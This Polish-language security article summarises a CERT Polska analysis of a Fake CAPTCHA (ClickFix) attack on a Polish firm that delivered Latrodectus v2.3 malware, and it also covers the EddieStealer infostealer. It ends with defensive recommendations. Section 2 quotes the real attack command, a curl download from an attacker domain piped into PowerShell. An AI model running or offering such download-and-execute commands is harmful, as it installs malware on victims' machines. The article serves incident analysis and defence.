Anatomia ataku Fake CAPTCHA na polską firmę

Kilka miesięcy temu jedna z dużych polskich organizacji padła ofiarą ataku, który pozwolił napastnikom na aktywne działanie w jej sieci ¹. Incydent ten, przeanalizowany przez zespół CERT Polska, stał się kanwą dla dogłębnego studium przypadku. Pokazuje on, jak pozornie prosty trik socjotechniczny może otworzyć drzwi do firmowej infrastruktury i doprowadzić do infekcji zaawansowanym złośliwym oprogramowaniem.

To historia o tym, jak pojedynczy, nieświadomy błąd pracownika może zagrozić bezpieczeństwu całej firmy ². Prześledzimy krok po kroku łańcuch ataku — od fałszywego testu CAPTCHA, przez wykonanie złośliwego kodu, aż po analizę rzadko spotykanego malware o nazwie Latrodectus.

Najważniejsze fakty

• Wektor ataku: Fałszywa CAPTCHA (znana jako ClickFix) ³.
• Metoda dostarczenia: Socjotechnika polegająca na nakłonieniu ofiary do skopiowania i uruchomienia kodu PowerShell ⁴.
• Złośliwe oprogramowanie: Latrodectus, zidentyfikowany w nowej wersji 2.3 ⁵.
• Cel ataku: Duża, nienazwana polska organizacja ¹.
• Skala: Kampania ma charakter masowy ⁶, a liczba podobnych ataków w Polsce rośnie ⁷.

Metodologia

Niniejszy raport jest przeglądem i syntezą publicznej analizy incydentu opublikowanej przez CERT Polska ¹ oraz danych z innych publicznie dostępnych raportów bezpieczeństwa ⁸. Naszym celem jest przedstawienie pełnego łańcucha ataku w sposób zrozumiały nie tylko dla specjalistów, ale również dla menedżerów IT i osób odpowiedzialnych za bezpieczeństwo w organizacjach. Wszystkie przedstawione fakty techniczne pochodzą z cytowanych źródeł.

Sekcja 1: Anatomia wektora — socjotechnika „na CAPTCHA”

Atak rozpoczyna się niewinnie. Użytkownik trafia na stronę internetową — często w wyniku przekierowania z innej, zainfekowanej witryny — która wyświetla fałszywy monit weryfikacyjny, imitujący popularny mechanizm Google reCAPTCHA. Zamiast standardowego zadania (np. zaznaczenia obrazków), strona prezentuje nietypową instrukcję. Użytkownik jest proszony o skopiowanie fragmentu kodu i wklejenie go do okna dialogowego „Uruchom”, wywoływanego skrótem klawiszowym Win+R ^{4 9}. Ma to rzekomo potwierdzić, że nie jest robotem.

To klasyczny przykład socjotechniki, która wykorzystuje zaufanie do znanych mechanizmów i brak świadomości technicznej u ofiary. Użytkownik, przekonany o autentyczności procedury, własnoręcznie wykonuje polecenie, które inicjuje infekcję.

Technika ta, znana w branży jako Fake CAPTCHA lub ClickFix ³, jest skuteczna, ponieważ obchodzi wiele tradycyjnych zabezpieczeń. Nie ma tu złośliwego załącznika w mailu ani pliku do pobrania — jest tylko polecenie, które ofiara sama uruchamia na swoim komputerze.

Co ciekawe, w analizowanym przez CERT Polska przypadku, w kodzie JavaScript strony phishingowej znaleziono token bota komunikatora Telegram ¹⁰. Token ten był jednak nieprawidłowy — zbyt krótki, by mógł działać. Analitycy podejrzewają, że kod strony mógł zostać wygenerowany przez duży model językowy (LLM — Large Language Model), a operatorzy kampanii nie dostosowali go poprawnie ¹⁰. To drobny, ale fascynujący ślad, sugerujący pewien stopień automatyzacji lub niedbalstwa po stronie atakujących.

Sekcja 2: Ślady na stacji roboczej — co zostawia po sobie atak

Po tym, jak ofiara wklei i uruchomi złośliwy kod, na jej stacji roboczej rozpoczyna się wieloetapowy proces infekcji. Polecenie wykonane przez użytkownika wyglądało następująco:

cmd /c curl naintn.com/amazoncdn.com/[...]/ca/ | powershell

Powyższa komenda instruuje system, aby za pomocą narzędzia curl pobrał zawartość ze zdalnego serwera, a następnie przekazał ją bezpośrednio do interpretera PowerShell w celu wykonania ⁴. To technika „bezplikowa” (fileless), która utrudnia wykrycie, ponieważ złośliwy kod jest uruchamiany bezpośrednio w pamięci, bez zapisywania go na dysku w początkowej fazie.

Analiza śledcza przeprowadzona przez CERT Polska pozwoliła jednak zidentyfikować artefakty pozostawione przez malware. W katalogu %APPDATA%\Intel znaleziono podejrzane pliki, w tym bibliotekę wtsapi32.dll ¹¹. Umieszczenie fałszywej biblioteki DLL (Dynamic-Link Library) obok legalnej aplikacji w celu jej załadowania to technika znana jako „DLL side-loading”. Dodatkowo, skanowanie dysku ujawniło inne podejrzane pliki DLL w katalogu /Users/[username]/AppData/Local/ ¹². Te ślady pozwoliły analitykom zrekonstruować działanie złośliwego oprogramowania.

Sekcja 3: Pod mikroskopem — Latrodectus v2.3

Ostatecznym ładunkiem (payloadem) dostarczonym w ataku okazał się malware z rodziny Latrodectus ⁵. Jest to następca znanego wcześniej oprogramowania IcedID. Co istotne, zidentyfikowana w ataku próbka należała do wersji 2.3 ⁵. W momencie analizy nie istniały niemal żadne publiczne raporty dotyczące tej wersji, co czyniło ją szczególnie niebezpieczną i trudną do zbadania ¹³.

Latrodectus został zaprojektowany tak, aby maksymalnie utrudnić życie analitykom bezpieczeństwa. Stosuje w tym celu szereg zaawansowanych technik, w tym:

1. Unikanie narzędzi analitycznych: Malware odmawia wykonania, jeśli zostanie uruchomiony za pomocą popularnych narzędzi do analizy dynamicznej, takich jak rundll.exe czy regsrv32.exe ¹⁴.
2. Mechanizmy antydebugowe: Najpoważniejszym wyzwaniem dla badaczy była technika znana jako NTDLL unhooking ¹⁵. Polega ona na tym, że malware samodzielnie odczytuje z dysku czystą kopię kluczowej biblioteki systemowej ntdll.dll i ładuje ją do pamięci własnego procesu. W ten sposób omija „haki” (hooks), czyli mechanizmy monitorujące instalowane przez oprogramowanie antywirusowe i systemy EDR (Endpoint Detection and Response), stając się dla nich niewidzialnym ¹⁵.

Te cechy świadczą o wysokim stopniu zaawansowania technicznego autorów Latrodectusa i ich determinacji w unikaniu detekcji.

Sekcja 4: Jeden wektor, wiele zagrożeń — ekosystem ClickFix

Wektor Fake CAPTCHA / ClickFix nie jest zarezerwowany wyłącznie dla Latrodectusa. To popularna i skuteczna metoda dostarczania różnego rodzaju złośliwego oprogramowania. Innym przykładem jest infostealer (złodziej informacji) o nazwie EddieStealer ⁸.

EddieStealer, napisany w języku programowania Rust, również rozprzestrzenia się za pomocą fałszywych monitów CAPTCHA ^{8 9}. Podobnie jak Latrodectus, stosuje techniki utrudniające analizę, takie jak szyfrowanie ciągów znaków za pomocą operacji XOR czy niestandardowe mechanizmy wyszukiwania funkcji systemowych ¹⁶.

Kluczową cechą tego infostealera jest jego modułowość. Zamiast mieć na stałe zakodowaną listę celów, EddieStealer dynamicznie pobiera konfigurację z serwera C2 (Command and Control — serwer kontroli i dowodzenia) ¹⁷. Pozwala to operatorom na elastyczne dostosowywanie jego działania w zależności od ofiary. Na liście celów EddieStealera znajdują się między innymi:

• Portfele kryptowalut
• Przeglądarki internetowe (w celu kradzieży haseł i ciasteczek)
• Menedżery haseł
• Klienci FTP
• Aplikacja Telegram ¹⁸

Istnienie różnych rodzin malware wykorzystujących ten sam wektor pokazuje, że mamy do czynienia z ugruntowanym i efektywnym modelem biznesowym w cyberprzestępczym podziemiu.

Implikacje dla polskiego biznesu

Analiza CERT Polska nie jest odosobnionym przypadkiem. To sygnał ostrzegawczy dla całego polskiego rynku. Obserwujemy rosnącą liczbę ataków tego typu w Polsce ⁷, a poszukiwania podobnych wskaźników kompromitacji ujawniły więcej polskich domen zainfekowanych w ten sam sposób ¹⁹.

Fakt, że ofiarą padła „duża polska organizacja” ¹, obala mit, że zaawansowane ataki dotyczą tylko globalnych korporacji. Każda firma, niezależnie od wielkości, może stać się celem masowej kampanii, a jeden nieostrożny pracownik wystarczy, by otworzyć napastnikom drzwi ².

Ataki oparte na socjotechnice webowej są trudniejsze do filtrowania niż klasyczny phishing mailowy, ponieważ często wykorzystują legalne, ale skompromitowane strony internetowe. To stawia nowe wyzwania przed tradycyjnymi systemami obrony.

Rekomendacje

Jak chronić organizację przed tego typu zagrożeniami? Obrona powinna być wielowarstwowa i obejmować zarówno technologię, polityki, jak i edukację.

Dla CISO / Menedżera IT

1. Ogranicz użycie PowerShell: Wdróż polityki (np. za pomocą GPO lub Microsoft Intune) ograniczające możliwość uruchamiania skryptów PowerShell przez standardowych użytkowników. Włącz logowanie bloków skryptów PowerShell, aby ułatwić przyszłe dochodzenia.
2. Weryfikuj skuteczność EDR: Upewnij się, że używane rozwiązanie EDR jest w stanie wykrywać i blokować zaawansowane techniki unikania detekcji, takie jak NTDLL unhooking ¹⁵. Przeprowadź testy z użyciem narzędzi symulujących takie techniki.
3. Prowadź ukierunkowane szkolenia: Zwykłe szkolenia antyphishingowe to za mało. Zorganizuj kampanię świadomościową skupioną na nietypowych wektorach socjotechnicznych, w tym na fałszywych monitach na stronach internetowych i ryzyku związanym z uruchamianiem kodu z nieznanych źródeł.

Dla zespołu SOC / Analityka

1. Wdróż reguły detekcji: Stwórz reguły w systemie SIEM (Security Information and Event Management) monitorujące proces powershell.exe uruchamiany z nietypowymi parametrami, zwłaszcza zawierającymi polecenia curl lub Invoke-Expression (IEX).
2. Monitoruj ruch sieciowy: Poluj na połączenia do nowo zarejestrowanych lub podejrzanych domen, zwłaszcza jeśli ruch pochodzi z procesów takich jak PowerShell. Domena naintn.com ⁴ jest przykładem wskaźnika, który można wykorzystać do poszukiwań.
3. Analizuj artefakty systemowe: Regularnie monitoruj i analizuj tworzenie plików w nietypowych lokalizacjach, takich jak %APPDATA%\Intel ¹¹ czy AppData/Local ¹², które mogą wskazywać na technikę DLL side-loading.

Dla pracownika

1. Nigdy nie uruchamiaj kodu ze stron internetowych: Prawdziwa weryfikacja CAPTCHA nigdy nie wymaga kopiowania i wklejania jakichkolwiek poleceń do systemu operacyjnego. Jeśli strona o to prosi, jest to próba ataku.
2. Bądź sceptyczny wobec nietypowych instrukcji: Jeśli jakakolwiek strona internetowa prosi Cię o wykonanie nietypowej czynności (np. naciśnięcie skrótu klawiszowego, pobranie „certyfikatu”, uruchomienie programu), potraktuj to jako sygnał alarmowy.
3. Zgłaszaj podejrzenia: W razie najmniejszych wątpliwości zamknij stronę i natychmiast zgłoś incydent do swojego działu IT lub bezpieczeństwa. Lepiej zgłosić fałszywy alarm niż doprowadzić do kompromitacji całej firmy.

---

Źródła

Zobacz też

• Alert: Luka XSS w Verint Verba zagraża danym administratorów
• Krytyczna luka RCE w SzafirHost od KIR (CVE-2026-44088)
• Krytyczne luki w Comarch ERP Optima — ryzyko przejęcia danych

Footnotes

1. CERT Polska analizował incydent malware, który dotknął dużą polską organizację. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩ ↩² ↩³ ↩⁴

2. Pojedynczy zainfekowany użytkownik może zagrozić bezpieczeństwu całej firmy. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩ ↩²

3. Atak był typu Fake CAPTCHA, znanego również jako ClickFix. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩ ↩²

4. Wektor infekcji polegał na nakłonieniu ofiary do skopiowania i uruchomienia złośliwego fragmentu kodu PowerShell za pomocą skrótu Win+R. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩ ↩² ↩³ ↩⁴

5. Złośliwe oprogramowanie zidentyfikowano jako rodzinę Latrodectus, w wersji 2.3. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩ ↩² ↩³

6. Kampanie typu Fake CAPTCHA mają charakter masowy i nie są wymierzone w konkretne organizacje. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩

7. Obserwuje się rosnącą liczbę ataków typu Fake CAPTCHA w Polsce. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩ ↩²

8. Infostealer EddieStealer również wykorzystuje technikę ClickFix (Fake CAPTCHA) i jest napisany w Rust. — https://kapitanhack.pl/infostealer-wykorzystujacy-sztuczke-z-clickfix-fake-captcha/ ↩ ↩² ↩³

9. Atak EddieStealer rozpoczyna się od fałszywych monitów Google reCAPTCHA, które instruują użytkownika do skopiowania i wklejenia polecenia PowerShell. — https://kapitanhack.pl/infostealer-wykorzystujacy-sztuczke-z-clickfix-fake-captcha/ ↩ ↩²

10. W kodzie JavaScript osadzonym na stronie Fake CAPTCHA znaleziono token Telegrama, który był zbyt krótki i prawdopodobnie błędny lub wygenerowany przez LLM. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩ ↩²

11. Na stacji roboczej ofiary zidentyfikowano podejrzane pliki w katalogu %APPDATA%\Intel, w tym wtsapi32.dll. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩ ↩²

12. Skan dysku wykrył dodatkowe podejrzane pliki DLL w katalogu /Users/[username]/AppData/Local/. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩ ↩²

13. Latrodectus w wersji 2.3 jest nowszą wersją, dla której nie ma wielu publicznych analiz. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩

14. Malware Latrodectus stosuje techniki utrudniające analizę dynamiczną, takie jak odmowa wykonania kodu przy uruchomieniu przez rundll.exe lub regsrv32.exe. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩

15. Latrodectus wykorzystuje mechanizmy antydebugowe, w tym odpinanie hooków na funkcje biblioteki NTDLL (NTDLL unhooking). — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩ ↩² ↩³

16. EddieStealer utrudnia analizę poprzez szyfrowanie ciągów XOR, usuwanie symboli funkcji i niestandardowy mechanizm wyszukiwania API. — https://kapitanhack.pl/infostealer-wykorzystujacy-sztuczke-z-clickfix-fake-captcha/ ↩

17. EddieStealer dynamicznie pobiera listę zadań z serwera C&C, co pozwala na dostosowanie jego zachowania. — https://kapitanhack.pl/infostealer-wykorzystujacy-sztuczke-z-clickfix-fake-captcha/ ↩

18. EddieStealer atakuje portfele kryptowalut, przeglądarki, menedżery haseł i klientów FTP, a także aplikację Telegram. — https://kapitanhack.pl/infostealer-wykorzystujacy-sztuczke-z-clickfix-fake-captcha/ ↩

19. Zidentyfikowano więcej polskich domen zainfekowanych w ten sam sposób. — https://cert.pl/posts/2026/02/fake-captcha-in-action/ ↩